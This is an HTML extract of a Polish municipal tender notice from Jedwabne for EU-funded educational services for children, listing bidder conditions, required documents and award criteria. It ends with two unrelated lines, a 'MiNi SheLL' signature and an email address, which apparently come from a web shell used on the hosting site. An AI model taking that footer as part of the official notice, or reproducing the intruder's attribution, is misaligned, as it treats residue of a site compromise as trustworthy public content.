-	Pomoc dydaktyczna Liczydła stojące duże lub równoważna; 10 rzędów korali (po 5 w każdym kolorze), stabilny, składany stojak utrzymuje liczydło oraz pozwala na swobodne przemieszczanie go w różne miejsca Sali, wym. 85 x 120cm - 1 sztuka,
-	Pomoc dydaktyczna Koraliki do ćwiczeń w liczeniu lub równoważna; koraliki do ćwiczeń manipulacyjnych, śr. krążka 25 mm, 100 szt. w 5 kolorach, 6 sznurówek o dł. 72 cm - 5 zestawów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie wykonawcy, potwierdzające fakt, że brał czynny udział w realizacji lub współrealizacji projektów finansowanych lub współfinansowanych przez Unię Europejską w okresie poprzedzającym upływ terminu składania ofert, w których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. podpadające pod kody CPV 80100000-5 - 80660000-8 - usługi edukacyjne lub szkoleniowe, a wartość jednego z tych projektów wynosiła co najmniej 100 tyś zł brutto.
2. Oświadczenie wykonawcy potwierdzające realizację usług/i, gdzie przedmiotem wykonania były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia tj. świadczenie usługi edukacyjnej której odbiorcami były dzieci. Należy wykazać minimum jedną taką usługę na kwotę 80 tys. zł. (kwoty usług nie podlegają sumowaniu)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że posiadają one wykształcenie kierunkowe właściwe dla świadczonej usługi* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c,
2. Oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że odbyli Oni przeszkolenie z zasad postępowania z dziećmi ze szkół podstawowych  w zakresie prowadzenia zajęć edukacyjnych z zakresu przedmiotu zamówienia, uprawdopodobniające że Wykonawca daje rękojmię należytego wykonania zamówienia, (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c
3. Oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy - jeśli osoby te dysponują potwierdzeniem odbycia tego typu przeszkolenia, potwierdzające, że odbyli Oni przeszkolenie w zakresie równości szans - zasada równości szans kobiet i mężczyzn (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualną informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, min. na 100 tys. zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, z którego wynika jego zakres, podpisane przez osoby uprawnione do reprezentowania Wykonawcy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie X i XI SIWZ). Uwaga: Pełnomocnictwo powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jedwabne.powiatlomzynski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Jedwabnem, ul. Żwirki i Wigury 3, 18-420 Jedwabne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 10:00, miejsce: Urząd Miejski wc Jedwabnem, ul. Żwirki i Wigury 3, 18 - 420 Jedwabne, pokój Nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, 
9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com